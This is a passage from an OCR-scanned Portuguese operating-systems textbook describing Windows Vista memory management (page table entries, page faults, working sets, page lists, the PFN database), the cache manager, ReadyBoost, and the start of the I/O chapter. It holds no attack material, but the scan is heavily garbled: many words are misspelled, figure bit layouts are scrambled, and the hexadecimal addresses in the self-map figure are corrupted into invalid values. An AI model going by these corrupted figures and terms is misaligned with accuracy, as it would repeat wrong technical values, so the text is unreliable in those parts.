usadas recentememe sao as menos provaveis de serem uti¬ 
liza das no va men te em um futuro próximo, O bit A permite 
que o gerenciador de memória determine se unia pagina 
foi acessada. O bit D permite que o gerenciador de tnemória 
saiba se urna pagina foi modificada, ou que nao foi modifi- 
cada — que e mais relevante. Caso u ma pagina nao tenha 
sido modificada desde sua Ieitura do disco, o gerenciador 
de memória nao predsa escrever os conteudos da pagina 
no disco antes de utiliza-la, 

A arquitetura x8ó norma]menie utiliza urna entrada 
de tabela de paginas dc 32 bits, enquanto a xó4 utiliza urna 
entrada de tabela de paginas de 64 bits, eon formę mos- 
ira a Figura 11.17. A iinica difcrenęa nos campus c que 
o campo *n u mero da pagina Esica" ocupa 40 bits, e nao 
20. Entretanto, os processos de 64 bits atuais da o suporte 
a um nu mero muito menor de paginas fisicas do que a ar- 
quiteiura de 64 bits permite representar. Os processadores 
x8ó tambem suporiam um lipo especial de PA£ (physica! 
address exkns'wn — extensao de endereęo ffsico) utilizado 
para permitir qtte o processador acesse mais da que 4 GB 


31 12 11 9 8 7 6 5 4 3 2 1 0 


(a) 

Numero da 
pagina fistca 

AVL 

G 

P 

A 

T 

D 

A 

P 

C 

D 

P 

w 

T 

U 

/ 

s 

R 

/ 

W 

P 

63 62 52 51 

12 11 98765432 1 0 

N 

X 

AVL 

Ntimero da 
pagina fisica 

AVL 

G 

P 

A 

T 

D 

A 

P 

C 

D 

P 

W 

T 

u 

/ 

s 

R 

/ 

W 

P 


NX — Nao executa 
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| Figura 11.17 Urna entrada de tabela de paginas para urna pagina mapeada ras arquiteturas (a) Intel x86 e (b) AMD x64. 
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de memória fisica. Gs bits adicionais da estrutura de pagina 
fisica fazem com que o tamanho da entrada na tabela de 
paginas na PAE tambem au nieme para 64 bits. 

As faltas de pagina podem ser da$ scguinies catcgorias: 

1. A pagina referenciada nao esta compromedda. 

2. Ocorreu u ma yiolaęao de proteęao. 

3. U ma pagina compartilhada do tipo copiar se escrha 
estava para ser modificada. 

4. A pilha precisa crescer. 

5. A pagina referenciada esta com pro met kia, mas nao 
esia mapeada, 

O primeiro e o segundo caso sao erms de programaęao. 
Se um programa tentar utilizar urn endereęo para o qual 
nao se supoe existir um mapeamento valido on temar exe- 
cu tai mm operaęao itwalida (como escrever em u ma pa¬ 
gina dc somente leitura), temos uma yiolaęao de acesso 
que normalnienie resulta no encerramento do programa. 
As violaęocs de accsso costumam ser o rcsultado dc pontci- 
ros niins quc incluem o accsso a memória que foi liberada 
e tcve sen mapeamento remoYido polo processo. 

O tcrceiro caso tern os mesmos simomas do segundo 
(uma tentatWa de escrever em uma pdgina de somente 
leitura), mas o tratamento e diferente, Como a pagina foi 
marcada como copiar se escrita, o gerenciador dc memória 
nao rcporla uma violaęao dc accsso. Em vcz disso, dc faz 
uma cópia privada da pagina para o processo atnal e retor- 
na o controle para o thread que lemou escrever na pagina. 
O thread, por sua vez, tema novameme escrever e agora 
conclui a operaęao sem nenbuma falha. 

O quarto caso ocorre quando um thread coloca um 
valor na pilha e referenda uma pagina que ainda nao foi 
alocada. O gerenciador de memória esta progratnado para 
reconhecer este como um caso especial. Enquanu> houver 
espaęo nas paginas reservadas para a pilha, o gerenciador 
de memória vai continua i a oferecer urna nova pagina fisi - 
ca zera da c mapeada para o processo. Quando a execuęao 
do thread retoma a execuęao, ele lento novamcnte o accsso 
c, dessa vcz, conseguc. 

Finalmeme, no qmnto caso tem-se uma falta de pagina 
normal. Entretanto, esse caso apicscrua diversos subcasos. 
Se a pagina esiivcr mapeada por um arquivo J o gerenciador 
de memória devc procurar por estruturas de dados, como 
tabela dc paginas protótlpo assodadas ao objęto de scęao, 
para se ceni fi car de quc ainda nao cxiste uma cópia na 
memória. Se houvcr — di gam os, em outro processo, em 
uma lista dc espera ou em uma lisia de paginas modifica- 
das — ele simplesmente a compartilha, talvez marcando 
como copiar se escrita caso as mudanęas nao devam ser 
compartiłhadas. Se nao existir uma cópia, o gerenciador de 
memória ira alocar uma pagina fisica livre c fara com que o 
arquivo de paginas seja copiado do disco. 

Quando o gerenciador de memória consegue satisfazer 
uma falta de pagina encontrando a pagina necessaria em 
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vez de le-la do disco, a falta e dassificada como falta apa- 
rente. Se a cópia do disco for necessaria, entao e unia falta 
estrita. Se comparadas as faltas estritas, as faltas aparentes 
sao muito mais baratas e causam me nos impacto no de- 
sempenho da aplicaęao. EJas podcm ocorrer quando uma 
pagina compartilhada ja foi mapeada em outro processo, 
quando somente uma nova pagina zera da e necessaria ou 
quando a pagina solicitada foi diminada do conjunto de 
trabalho do processo antes de ter a cbance de ser reutiliza- 
da, mas esta sendo novamente solicitada. 

Quando uma pagina fisica nao esta mais mapeada pela 
tabela dc paginas de nenhum processo, cla e coloca da cm 
uma das seguintes listas; livrc, modificada ou cm espera, As 
paginas que nunca mais serao nccessarias, como as pagi¬ 
nas de pilha de processos condufdos, sao automaticamente 
liberadas. As paginas que podem causar ntwas faltas vao 
para a lista de motliflcadas ou para a lista de espera, depen- 
dendo da configuraęao do bit D (modificada) para qualquer 
uma das entradas da tabela de paginas que mapearam a pa¬ 
gina desde que esta foi lida do disco. As paginas na lista de 
modificadas serao eventualmeme escritas no disco e entao 
moyidas para a lista de espera. 

O gerenciador tle memória pode alocar paginas eon- 
forme necessario por meio da lista de livres ou da lista de 
espera. Antes de alocar uma pagina e copia-la do disco, o 
gerenciador de memória sempre verilica as listas de livres e 
de espera para veri(icar se a pagina ja esta na memória. No 
Windows Vista, o esquema de preparo converte as futuras 
faltas estritas em faltas aparentes por melo do carregamen- 
to das paginas quc dcvcin ser ncccssarias e sua colocaęao 
na lista dc espera. O próprio gerenciador dc memória faz 
uma peguena parte da pre-paginaęao accssando grupos de 
paginas consecutivas, e nao dc paginas indiYiduafc. As pa¬ 
ginas adidonais sao imediaiarnente colocadas na lista de es¬ 
pera. Esse procedimemo nao cosnnna ser um desperdicio, 
pois a sobrecarga no gerenciador de memória costuma ser 
causada pelo custo de realizar somente uma operaęao de 
E/S. A diferenęa de custo para a leitura de um aglomerado 
de paginas, em vez dc unia pagina somente, e desprezivel. 

As entradas rui tabela de paginas da Figura 11.17 refc- 
rem-sea nihnerosde paginasffsicas, nao Yirmats. Para atua- 
lizar as entradas das tabelas de paginas, o ruicleo precisa 
utilizar endereęos virtuais. O Windows mapeia as tabelas 
e os diretórios de paginas do processo atual no espaęo de 
endereęamento virtual do niicleo milizando uma entrada 
de automapeamento no diretório de paginas, conforme 
mostrado na Figura 11.18. Mapeando uma entrada do dire¬ 
tório dc paginas c fazendo com que ele apontc para o di¬ 
retório de paginas (automapeamento), cxistcm endcrcęos 
virtuais quc podem ser utilizados para rcferenciar entradas 
de diretórios de paginas (a), bem como entradas de tabelas de 
paginas (b). O automapeamento ocupa 4 MB e endereęos 
virtuais do niicleo para todos os processos (na arąuitetura 
x8ó). Ainda bem que sao os mesmos 4 MB, que nem sao la 
grandę coisa boje em dia. 
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Automapeamento: PD|Oxc0300000»22] e o diretório de paginas (PD) 

Endereęo vsrtuat (a): (PTE*)(Qxo03Q0cQQ) aponta para PD[Ox300f, qu@ ó o automapeamanto da entracfa do diretório de póginas 
Erdereęo virtuaf (b): (PTE 1 )(0xcO390o84) aponta para a entrada da tabela de paginas (PTE) para o endereęo virtual 0x@4321000 


Figura 11.18 A entrada de automapeamerito do Windows aa arguitetura x8$ utiiizada para mapear aa paginas ffaicas de tabelas e 
diretórios de paginas em endereęos virtuais do nOcleo, 


O algoritmo de substituięao de paginas 

puando o numer o de paginas de memória fisi ca livres 
comeęa a ficar baixo, o gerenciador de memória comeęa 
a remover paginas dos processos no modo usuario e dos 
processos do sistema, que representam o uso de paginas no 
modo micleo, de forma a disponibilizar mais paginas fisicas, 
O objctivo c manter as paginas virtuais mais importantes na 
memória e as outras no disco. O diffcil e determinar o que 
e importem te. No Windows, csse concdto e definido pelo uso 
acentuado do conjunto dc trabalho. Gada proccsso (e nao 
eada thread) tein um conjunto de trabalho. Esse conjun¬ 
to consiste nas paginas mapeadas que estao na memória e 
qne podem ser rcferenciadas scm u ma fal ta dc pagina. O 
tamanho e a tomposięao do con junto de trabalho variam, e 
cl aro, conforme a execuęao dos threads do processo. 

Gada conjunto de trabalho de urn proccsso c deścriro 
por dois para metr os: o tamanho nifnimo e o tamanho ma- 
ximo. Esses limites nao sao rigidos; portanto, um processo 
pode ter menos paginas na memória puc sen mmimo, ou 
(sob certas drcunsiancias) mais que sen maximo. Todo pro¬ 
ccsso inicializa com o mesrno mmimo e o mesrno maxitno, 
mas esses limites podem rnudar com o tempo ou podem 
ser definidos segundo o objęto da tarefa para os processos 
contidos nessa tarefa. 0 minimo inicial fica entre 20 e 50 c 
o maximo inicial fica entre 45 e 345, dependendo da quan- 
tidade total de RAM. O administrator do sistema, todavia, 
pode aherar esses valores iniciais. Embora poucos usuarios 
domesticos se interessem em alicrar essas definięoes, mui- 
los adminisiradores podem desejar faze lo. 

Os conjuntos dc trabalho somente en tram em aęao 
quando a memória fisica dispomvel esta diminuindo. Sc- 
nao, os processos tern permissao para consumir o qnan- 
to desejarem da memória c, cm geral, acabam exccdcndo 


o valor niaximo para o conjunto dc trabalho. Entretamo, 
quando o sistema fica sob pressao de memória, o geren- 
ciador dc memória comeęa a comprimir os processos den- 
tro dc scus conjuntos dc trabalho, comeęando pclos pro¬ 
cessos queja cxcedcram muito o Umilę. Exisiem trćs mveis 
de atividadc para o gerenciador do conjunto de trabalho, 
os quais sao periodicamenie bascados no tempo. Urna nova 
atmdade e incliuda em cada mvel: 

1, Muita memória dsspontveh varrc as paginas rei- 
nicializando os bits de acesso e utilizando sens valo- 
res para representar a kiade de cada pagina. Mantem 
uma esliniativa de paginas nao utilizadas cm cada 
conjunto de trabalho, 

2, A memória esta diminuindo: para qua]quer pro¬ 
cesso com nma ąuantidade significativa de paginas 
nao ntilizadas, para de adirionar paginas ao conjun¬ 
to de trabalho e comeęa a snbstituir as paginas mais 
antigas sempre que uma nova pagina fornccessaria, 
As paginas substituidas vao para a lista de livres ou 
de espera. 

3, A memória esta baixa: remove as paginas mais 
antigas, diminuindo os conjuntos dc trabalho para 
quc eles fiqucm abaiso dc sen valor maximo. 

O gerenciador dos conjuntos de trabalho t executado 
a cada segundo, chamado pelo tliread gerenciador do 
conjunto de eąuilibrio, O gerenciador dos conjuntos de 
trabalho diminui a quantidadc dc trabalho qtic executa por 
meio da sobrecarga do sislema, Ele tambem monitora a es- 
crita de paginas na lista de modificadas do disco, de forma 
a gara mir que a lista nao fique muito extensa, e desperta o 
tliread ModifiedRageWriter sempre quc n ccc ssano. 
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Gerenciamento da memória fisica 

Acabamos de mmcionar tres listas diferentes de pa¬ 
ginas ffsicas: a lista de livres, a lista de espera e a lisia de 
modificadas. Exisie ainda uma quarta lista que contem as 
paginas livres que foram zeradas. O sistema freąuentemen- 
te precisa de paginas que somente contenham zeros. Quan- 
do novas paginas sao entrcgues aos proccssos, ou ąuando 
a ultima pagina parciał no finał dc nm arquivo e lida P unia 
pagina zcrada ć ncccssaria, Muifo tempo e gasło na escrita 
dc uma pagina com zeros, portanto e melhor utilizar um 
thread de baixa prioridade e criar paginas zeradas no se- 
gundo piano. Ha tambem uma quinta lista utilizada para 
armazenar as paginas que foram ideniificadas como con- 
tendo erros de hardware (isto e, por meio da detccęao de 
erro de hardware). 

As paginas no sistema sao referenrindas por uma eu- 
trada valida de uma tabela dc paginas ou estao em uma 
das cinco listas citadas, que sao coletivamente cha mada s 
de base de dados dos numer os de molduras de pagi¬ 
na (base de dados PFN), e sua estrumra e mostrada na 
Figura 11.19. A tabela e indexada pelo nilmero da moldura 
de pagina fisica. As entradas possuem tamanho fixo, mas 
diferentes formatos sao ulilizados para tipos de entrada 
distmtos (por exemplo, campart lilia da versus privada). As 
entradas va!idas mantem o estado da pagina c um conta- 
dor qite informa quantas tabelas dc paginas apontam para 
a pagina, de forma quc o sistema saiba quando uma pagi¬ 
na nao esta mais cm uso, As paginas dc um conjunto dc 
trabalho informam quais entradas as rcfercnciam, Existc 
ainda um ponteiro para a tabela de paginas do processo 
que a po ma para a pagina (no caso de paginas nao compar- 
tilliadas) ou para a tabela de paginas proiótipo (no caso de 
paginas compartilliadas). 

Alem disso r cxistc uma referenda para a próxima p ( i- 
gina na lista (caso baja uma) c diversos outros campos e 
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sinalizadores, como kitura em andamento, escrita em anda- 
mento etc. Para economizar espaęo, as listas estao ligadas 
a campos que fazem referenda ao próximo eleniento por 
meio de seu indice dentro da tabela, e nao por meio de 
ponteiros. As entradas da tabela para as paginas ffsicas tam¬ 
bem sao utilizadas para resumir os bits sujos encontrados 
nas diferentes entradas da tabela dc paginas quc apontam 
para a pagina fisica (por conta das paginas tompartilhadas). 
Em sistemas servidores maiores, nos quais existem metnó- 
rias inais rapidas para determinacje* processadores, ha ain¬ 
da informaęoes utilizadas na representaęao das diferenęas 
nas paginas da memória. Hssas maąuinas sao denominadas 
maquinas NU MA. 

A movimcntaęao das paginas pclos conjuntos de trą¬ 
bą] ho c as diferentes listas e feila pelo gerenciador de con- 
juntos de trabalho e outros threads do sistema. Vamos ver 
como ocorrem essas transięoes, Quando o gerenciador de 
conjuntos de trabalho remove uma pagina de urn conjunto 
de trabalho, a pagina segue para o finał da lista de espe¬ 
ra on da lista de modificadas, dependendo de seu gran de 
limpeza, Essa transięao e mostrada em (1) na Figura 1L20, 

As paginas de ambas as listas ainda sao consideradas va- 
lidas e, caso ocorra unia falta de pagina e uma dessas paginas 
seja necessaria, ela e removida da lista e colocada de voIla 
no conjunto de trabalho sem nenhuma operaęao de E/S no 
disco (2). Quando existe um processo, suas paginas nao 
compartilhadas nao podem ser novamenie carregadas 
nclc c r assim, as paginas validas em sua tabela de paginas 
e qualquer uma dc suas paginas nas listas de espera ou de 
modificadas vao para a lista de Hvres (3). Qualquer espaęo 
relacionado a arquivo dc paginas tambem e libera do. 

Outras transięneS sao causadas por outros threads do 
sistema, A ca da 4 segundos, o gerenciador do conjunto 
de eąuilfbrio e cx ecu ta do e procura por pro ces sos para os 
quais exi stem threads odososporum dc termin a do nu mero 


Base de dados de molduras de pagina 
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Tabelas de paginas 



I Figura 11.19 Aiguns dos principais campos na base de dados de molduras de pagina para uma pagina v£iida. 
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I Figura 11.20 As varias Eistas de paginas e as transięóes enire elas. 


de segundos. Caso enconłre, as pilhas de nudeo de lais 
processos sao retiradas da memória fisica e suas paginas 
sao movidas para a lista de espera ou para a lista de modi- 
ficadas, conforme mostra a Figura 1L20{1). 

Dois outros threads do sistema, o escritor de paginas 
mapeadas e o escritor de paginas modificadas, des- 
pertam periodicamente para verificar se ha paginas lirnpas 
suficientes. Se nao ha, eles retiram as paginas do topo da 
lista modificada, escrevem-nas de novo no disco e r entao, 
passam-nas para a lista de espera (4). O primeiro lida com 
escritas em arquivos mapeados; o ultimo lida com escritas 
nos arquivos de paginaęao* O resultado dessas escritas e 
transformar paginas da lista de modificadas (sujas) em pa¬ 
ginas da lista de espera (lirnpas). 

A razao de haver dois threads e que um arqnivo ma- 
peado pode precisar crescer como um resultado da escrita 
e esse crescimento requer acessos a estruturas de dados em 
disco para alocar um bloco de disco livre* Quando unia pagi- 
na tern de ser escrita, se nao houver Ingar para traze-la para 
a memória, pod era ocorrer um impasse, O outro thread 
e capaz dc resolvcr o pi obiema escrevendo paginas cm um 
arquivG de paginaęao, 

As outras transięóes da Figura 1 L20 sao as seguintes. 
Se um processo deixa de niapear unia pagina, a pagina nao 
lica mais assodada a um processo e pode ir para a lista de 
livres (5), exceto para o caso em que ela seja compartilha- 
da, Quando urna Ealta de pagina reąucr urna moldura de 
pagina para hospedar a pagina a ser lida, essa moldura e 
re tira da da lista dc livres (6), se possivd. Nao ha problema 
se a pagina ainda contiver alguma informaęaoconfidencial, 
pois ela sera loialmenie sobreserila. 

A situaęao e diferente quando unia pilha cresce* Nes- 
se caso, torna-se necessaria urna moldura de pagina que 
es tej a vazia e as regras de seguranęa cxigem quc a pagina 
só contenha zeros. Por isso, um outro thread do sistema, o 
thread ZeroPage, executa na mais baixa prioridade (veja 
a Figura 11.13), apagando paginas que estejam na lista de 


livres e colocando-as na lisia de paginas zeradas (7). Sem- 
pre que a CPU estiver ociosa e houver paginas livres, elas 
poderao ser zeradas — urna vez que urna pagina zerada e 
potendalniente mais util que unia pcigina iivre e nao custa 
nada zerar unia pagina quando a CPU esta ociosa. 

A existencia de todas essas listas kva a algumas es- 
colhas polfticas sulis. Por exemplo, suponha que Lima pa¬ 
gina tenha de ser trazida do disco e a lisia de livres esteja 
vazia. O sistema e, entao, obrigado a escolher entre tirar 
urna pagina limpa da lista de espera (que pode vir a sofrer 
nova falta mais tarde) ou tirar uma pagina vazia da lista de 
paginas zeradas (jogando fora todo o trabalho de zera-la)♦ 
O que c melhor? 

O gerendador de memória deve deddir o quao agressi- 
vamente os threads do sistema devem mover as paginas da 
lista de modiiicadas para a lista de espera. Ter paginas lirnpas 
espalhadas e melhor do que ter paginas sujas espalhadas 
(ja que as primeiras podem ser instantaneamente reutiliza- 
das), mas unia polftica de limpcza agressiva significa mais 
operaęócs de E/S no disco c ainda exi$te a possihilidade de 
uma pagina que acabon de ser limpa ser levada de volta 
a seu conjunto de trabalho e acabar novamenie suja. Em 
geral, o Windows resolve esses tipos de troca por meto de 
algoritmos, lieurfstlcas, mferenrias, precedenies históricos, 
principios basicos e configuraęao de para met ros controlada 
pelo ad ministra dor. 

Enfim, o gercnciamento dc memória ć um subsistema 
basiante compkxo c com muitas estru tu ras dc dados, atgo- 
rilmos e heuristicas. Ele Lenia scrautoajustavel ao maximo P 
mas ha lambóm para met ros que os administradores podem 
aj u star para atu ar no desempenho do sistema, Yarios des- 
ses para met ros e contadores associados sao passfveis de ser 
verificados com ferramentas de varios dos kits ja mencio- 
nados, O mais importante a lembrar aqui talvez seja quc o 
gercnciamento de memória em sistemas reais ć muito mais 
que apenas um simples algoritmo dc paginaęao como o do 
relógio c o do envclliecimcmo (a&ing). 
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Caching no Windows Vista 

A cache do Windows alimenta o desempenho de sis- 
tenias de arquivos ma mendo na memória as regioes re- 
eente e frequentemente u I iii za da s dos arquivos, Em vez de 
armazenar blocos fisicos endereęados a partir do disco, o 
gercndador de cache administra blocos viriualmerue en¬ 
dereęados, o u seja, regioes de arquivos. Essa abordagem se 
encaixa bem na estru tura do sistema de arquivos do NT 
(NTFS), conforme veremos na Seęao 11.8. O NTFS arrna- 
zena to dos os sens dados como arqnivos, indusive os meta- 
dados do sistema de arquivos, 

Essas regioes de arquivos armazenadas cm caclie sao 
cl tama da s de visdes {vkws) r pois representam regioes de en¬ 
dereęos virtuais do nucleo mapeadas em arqnivos do sistema 
de arquivos. Assmi sen do, ogerenciamento real da memória 
Esica na cache e feiio pelo gercndador dc memória, O papci 
do gerenciador dc cache e administrar o uso dos endereęos 
virtuais do nucleo para visóes, organizar para que o geren- 
ciador de memória mamon ha as paginas da cache na me¬ 
mória Esica e oferecer inierfaces para o sistema de arquivos. 

Os recursos do geronda dor de cache do Windows sao 
compartilhados com todos os sistemas de arquivos. Como a 
cache e virtualmente endereęada segundo arquivos indrn- 
d u ais, o gcrcnciador de cache conscgue rcalizar facilmcnic 
tdluras antedpadas para cada arquivo. As solkitaęocs de 
accsso aos dados armazenados cm cache sao enviadas por 
cada sistema de arquivos. O procediniemo de caching vir- 
tual e conveniente porque os sistemas de arqiiivos nao pre- 
tisam primeiro traduzir as pattes do arquivo em mhneros 
de blocos fisicos solicitando urna pagina de aiquivo arma- 
zenada cm cache. Em vez disso, a traduęao acontecc mais 
tarde, quando o gcrcnciador dc memória chama o sistema 
de arquivos para acessar a pagina no disco. 

Alem do gerenciamento do endereęo virtual do ml¬ 
eko e dos recursos da memória Esica milizada como ca¬ 
che, o gcrcnciador de cache tambem precisa estar em con- 
sonancia com os sistemas de arquivos no quc diz respeito 
a coerencia das yisualizaęóes, esci itas para o disco e corre- 
ta manuienęao das marcas de firn de arquivo — em espe- 
cial quando os arquivos aumentam. Um dos aspecios mais 
diftceis de um arquivo a ser gerenciado entre o sistema de 
arquivos, o gercndador de cache e o gcrcnciador dc me¬ 
mória c o SGgmeiito do ultimo by te do arquivo, chamado 
dc ValidDiUaUn$th. Sc um programa escrcvc para alem do 
finał de um arquivo, os blocos 'puiados' devem ser preen- 
chidos com zeros e, por razoes de seguranga, e essencial 
que o va lor de VafidDataLength gravado nos me ta da dos do 
arquivo nao permita accsso a os blocos nao inicia Liza dos, 
e, portanto, os blocos zera dos devem ser escritos no disco 
antes quc os metadados sejam atualizados com o novo 
ta ma n ho. Embora seja esperado que, no caso de para das 
do sistema, alguns blocos no arquivo podem nao ter sido 
atualizados com os dados da memória, nao e aceitavel que 
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alguns blocos contenham dados que antes pertenciani a os 
outros arquivos. 

Vamos agora analisar como o gcrcnciador de cache 
Irabalha, Quando um arquivo ć referendado, o gcrcncia¬ 
dor de cache mapę i a 256 KB do espaęo de endereęamento 
yiriual do nucleo para o arquivo, Sc o arquivo for maior 
do que 256 KB, somente parte dek e mapeada, Se o geren- 
dador de cache nao dispuser mais de espaęos de 256 KB 
de espaęo de endereęamento, ele deve retirar os arquivos 
mais antigos antes de mapear um novo. Uma vez mapeado 
o arquivo, o gercndador de cache pode atender as reąuisi- 
ęóes de blocos desse arquivo apenas copiando do espaęo de 
endereęamento virtuol do nucleo para o buffer do usuario. 
Se o bloco copiado nao estivcr na memória lisica, ocorrcra 
uma falta dc pagina e o gcrcnciador de memória atende¬ 
ra a falta da maneira itsual O gercndador de cache nem 
niesmo fi cara sabendo se o bloco esnwa ou nao na cache, A 
cópia sempre sera bem-sucedida. 

O gercndador de cache tambem controla paginas mapea¬ 
das para memória vimial c accssadas com pontciros cm vez 
de serem copiadas entre os buffers do usuario e do nucleo. 
Quando um thread acessa um endereęo virmnl mapeado 
para um arquivo e ocorre uma falta de pagina, o gercndador 
de memória consegue, em muitos casos, iransformar a falta 
de pagina em urna falta aparente, Ele nao precisa acessar o 
disco porąue descobre que a pagina ja esta na memória Esica 
por conta do mapeamento do gercndador de cache. 

Caching nao c apropriado para lodas as aplicaęóes. 
Grandcs aplicaęóes empre sari ais, como SQL, preferem gc- 
reneiar seu próprio caching e E/S. O Windows permite que 
os arquivo$ sejam abcrlos para E/S sem buffer, que nao 
passam pelo gercndador de cache. Historicaniente, lais 
aplicaęóes prefeririam substituir o mecanismo de caching 
dos sistemas operacionais por espaęos de endereęamento 
virtual de usuario maiores c, portanto, o sistema suporta 
uma configuraęao na qual pode ser reinidalizado dc modo 
a oferecer 3 GB dc espaęo dc endereęamento virtual de 
usuario para as aplicaęóes quc assim solid ta renu utilizan- 
do somente 1 GB para o modo mideo, em vez da divi$ao 
coiwencional de 2 GB-2 GB. Esse modo de operaęao (cha¬ 
ma do modo /3 GB após a troca de cache de imcializaęao 
que o viabiliza) nao € tao flexfvel como em alguns sistemas 
operacionais que pet mitem que os espaęos de endereęa¬ 
mento do usuario c do nucleo sejam divididos com maior 
granularidadc. Quando o Windows funciona no modo /3 
GB, somente metade do nu mero de endereęos virtuais do 
nudeo esta dispomvcL O gcrcnciador dc cache faz esse 
ajustc rnapeando um nu mero muito menor de arquivos, 
quc e o quc o SQL preferiria. 

O Windows Vista imroduziu uma forma compictamen- 
te nova de caching no sistema, dcnom.inada ReadyBoost, 
qne e diferente do gcrcnciador de cache. Os usuarios po¬ 
dem conectar uma memória flash a USB ou a outras port as 
e conscguir que o sistema operacional utilizc cssa memória 
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como urna cache de eserita direla. A memória flash imro- 
du7. u ma nova ca mada na hicrarquia dc memória, quc e 
particularmente uiil no auinento da quantidade de caching 
de leitura de dados de disco que e possiveL As leituras da 
memória flash sao relativamente rapidas, embora nao tao 
rapidas qiianlo a RAM dmamica (DRAM) milizada na me¬ 
mória coiwcncionaL Como a memória flash e rdaiivamen- 
tc barata se cooiparada a DRAM, cssa caractenstka do Visia 
per mile que o sistema apresente melhor desempenho tom 
menos DRAM — e tndo sem que seja neccssario abrir o 
gablocie do coinputador. 

ReadyBoost ęomprime os dados (em geral, 2x) e codi- 
fiea-os. A implementaęao faz uso de um driver filtro que 
processa as solkiiaęoes dc H/S en Wadas ao gerenciador de 
volume pelo sistema de arqmvos. Urna tecnologia seme- 
lhante, denominada ReadyBoot, e milizada para acelerar 
o tempo de imcializaęao em alguns sistemas Windows Visia 
por meio da caching de dados para a memória flash. Essas 
tecnoiogias tem menos impacto cm sistemas com i GB on 
mais de DRAM. Ełas sao realmente uteis em sistemas ten- 
tando exccuiar o Windows Vista comsomente 312 MB de 
DRAM. Com valores próximos de 1 GB, o sistema dispoe 
de memória suficiente para qnc pa gin a ca o sob demanda 
seja tao pouco comom e a capacidade de E/S do disco de 
conta da maioria dos cenarios de uso. 

A abordagem de escriia direta e importante na mi- 
nimizaęao da perda de dados caso a memória flash seja 
desconectada, mas e possivel que projetos fuluros de 
hardware ineorporem memória flash diretamente na płaca- 
-mae. Se isso acontecer, a memória flash podera ser miliza- 
da sem escriia direla, o que perrmtira ao sistema armazenar 
em cache os dados criticos que devem permanecer ima etos 
mesmo depois de urna parada no sistema, sem ter dc aces- 
sar o disco. Esse recurso e valido nao somente por conta 
do desempenho, mas tambem na reduęao do consumo de 
energia (e, consequentemente, no aumento do tempo de vida 
da bateria nos notebooks), ja que o disco tem menos aces- 
sos, Hojc cm dia, alguns notebooks se adiantam e diminam 
totalmente a presenęa de um disco eietromecanico e, no 
lugardele, utiiizam milka memória flash. 
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Entrada/saida no Windows 
Vista 


Os objetwos do gerenciador de E/S do Windows sao 
forncccr urna estrutura fundamentalmeiite extenstvel e 
flexfvcl para Udar, dc modo efkicme, com urna grandę va- 
riedade de dispositivos e semęos dc E/S, snportar a des- 
co berła autoiiiatica dc pcrilericos (pług-and-play) e fazer 
a instalaęao de scus drivers c realizar o gerendamemo dc 
energia dos dispositivos e da CPU — ludo por meio dc inna 
estrutura fundamenta!menie assmerona que permiie que 
o processa mento se sobreponha as transferendas de E/S. 
Existem muitas centenas de milhares de dispositivos que 
trabalham com o Windows Yisia. Para muilos desses dis- 


positivos, nao e seąuer necessario instalar um driver, pois 
ja existe um driver distribufdo com o sistema operacional 
Windows. Ainda assini, considerando todas as revis5es, ha 
quase um milhao de drivers binarios diferentes que sao 
cxccutados no Vista. Nas próximas scęócs, estudaremos al- 
guns dos tópicos rc lado na dos com E/S. 

11.7.1 I Conceitos fundamentais 

O gerenciador de E/S e ligado intimamemc com o ge- 
renciador de recursos plug-and-play. A idei a principal por 
tras dos recursos phuj and-play e o barramento enumeraveL 
Muilos barramemos, incluindo PC Gard, PCI PCI-x, AGP, 
USB, IEEE 1394, EiDH c SATA, foram projetados dc modo 
que o gerenciador dc recursos ptug-and-play possa enviar 
uma solicUaęao para cada slot e pedir quc o disposiiivo sc 
idenii(iquc nele; Lendo descobcrto qual e, o gerenciador de 
recursos plug-and-phiy aloca recursos dc hardware, como 
nfveis dc imerrupęao, I ocal i za os drivers apropriados c os 
carrega para a memória. A medida que cada driver e carre- 
gado, um objęto de driver e criado para cle, e depois, para 
cada dispositivo, pelo menos um objęto dc dispositivo e alo- 
cado. Para alguns barramemos, como o SCSI, a enumeraęao 
aconiece apenas no moment o da inktalizaęao; para oulros, 
como o USB, pode acomecer a qua1qucr momemo, sendo 
necessaria u ma esłrdla cooperacao cnirc o gcrcnciador dc 
recursos plug-and-play, os drivers dc barramento (que dc 
fato rcalizam a enumeraęao) e o gerenciador dc E/S. 

ISTo Windows, todos os sistemas dearqmvos, filtros anti- 
vfms, gcrenciadorcs de vol.ume, pillias de protocolo dc redc 
e atc scrvięos do nudeo quc nao tem hardware assodado 
sao implcmcntados usando-sc drivers dc E/S, A eon figura- 
ęao do sistema dcvc scrajustada dc modo quc alguns desses 
drivcrs sejam carregados, pois nao ha disposiiwo assodado 
para enumerar no barramento. Outros, como os sistemas 
dc arquivos, sao carregados por código espcciai quc dctccta 
ąuando eles sao soltciiados, como o rcconhccedor de siste¬ 
mas de arquivos que olha para um volume bruto e decifra 
que lipo de for mato de sistema dc arquivos ele comeni. 

Uma caractenslica interessante do Windows e o su- 
porte a discos dinamicos, quc podem cobrir varias par- 
tięócs e a te mesmo varios discos podendo ser rccon figura - 
dos em Lempo reah sem nem mesmo ter de rei ni da li za r, 
Dcssa forma, os volumes lógicos nao sao mais foręados a 
uma unica partięao on a um unico disco, de modo que 
apenas um sistema dearquivos possa abranger varias uni- 
dades de forma transparctite. 

A E/S para volumes pode ser filtrada por um driver 
cspecial do Windows para produzir cópias sombra de vo- 
lume. O driver dc fi liro cria uma imagem insianianea do 
Yoiume que pode ser montada sępa rada mc ntc e representa 
um Yolumc cm um ponto anterior no tempo. Ele faz isso 
regislrando as mudanęas quc ocorrem depois do momen- 
lo da geraęao da imagem insianianea. Isso e muito coiwe- 
nientc para a recuperaęao de arquivos que foram apagados 
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de maneira addemal ou para vokar no tempo e ver o es- 
tado de um arquivo nas imagens instamaneas periódicas 
geradas no passado. 

Entretanto, as cópias somhras tambem tein sen walor 
por fazę rem backups precisos de sistemas do senódor. O 
sisiema trabalha corn as aplicaęoes de servidor para que 
elas a I ca licem um ponto corweiiiente para um backup lim- 
po de seu estado persistente no volume. Urna vez que todas 
as aplicaęoes estao promas, o sistema iiiicializa a imagem 
instantanea do volume e, entao, dizas aplicaęoes que elas 
podem continuar. O backup e feito do estado do voImne no 
porno da imagem instamlnea, e as aplicaęoes foram blo- 
ąueadas apenas por um curlo espaęo de tempo no lugar de 
terem de fi car desconectadas durante o tempo do backup. 

As aplicaęoes partidpam na geraęao dc imagens ins- 
tantaneas de modo que, o backup reflete um estado facit 
de restaurar no caso dc urna falha no futuro. Caso contra- 
rio, o backup pode ainda ser util mas o estado que de cap- 
turon seria mais parecido corn o estado se o sisiema tivesse 
